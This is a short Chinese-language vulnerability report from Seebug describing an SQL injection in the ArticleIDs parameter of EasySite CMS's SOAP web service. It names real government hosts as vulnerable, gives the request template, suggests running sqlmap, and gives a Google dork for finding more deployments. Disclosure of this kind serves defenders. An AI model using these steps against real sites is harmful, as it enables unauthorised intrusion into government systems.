easysite内容管理系统某简单粗暴的SQL注入

2014-07-22T00:00:00
ID SSV:96086
Type seebug
Reporter Root
Modified 2014-07-22T00:00:00

Description

简要描述:

web services是不会骗人的~! 大量gov站点采用了easysite内容管理系统。

详细说明:

1.soap注入 easysite webservice 文件:

http://www.py.gov.cn/DesktopModules/C_Info/WebService/C_InfoService.asmx

<img src="https://images.seebug.org/upload/201406/16205754b156bffb45e993cebd2705c5433a0a3f.png" alt="soap.png" width="600" onerror="javascript:errimg(this);">

2.ArticleIDs参数存在SQL注入漏洞

<img src="https://images.seebug.org/upload/201406/16205943eaac7fc9387e0624469c89834d6a2f60.png" alt="sql1.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201406/162103065ae6e39928fb3b9728a50f595bbbf716.png" alt="SQL2.png" width="600" onerror="javascript:errimg(this);">

随便找个放sqlmap里跑吧

POST /DesktopModules/C_Info/WebService/C_InfoService.asmx HTTP/1.1 Host: dynamic.xmedu.gov.cn Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://tempuri.org/GetArticleHitsArray" &lt;?xml version="1.0" encoding="utf-8"?&gt; &lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt; &lt;soap:Body&gt; &lt;GetArticleHitsArray xmlns="http://tempuri.org/"&gt; &lt;ArticleIDs&gt;string&lt;/ArticleIDs&gt; &lt;/GetArticleHitsArray&gt; &lt;/soap:Body&gt; &lt;/soap:Envelope&gt;

<img src="https://images.seebug.org/upload/201406/162107259e0f64badcbb148e3305dda96ef7b887.png" alt="sql3.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

如果你不知道谁在用easysite,那就google(If you can open it)下把: inurl:asmx DesktopModules (海关总署N个域名都是这套系统)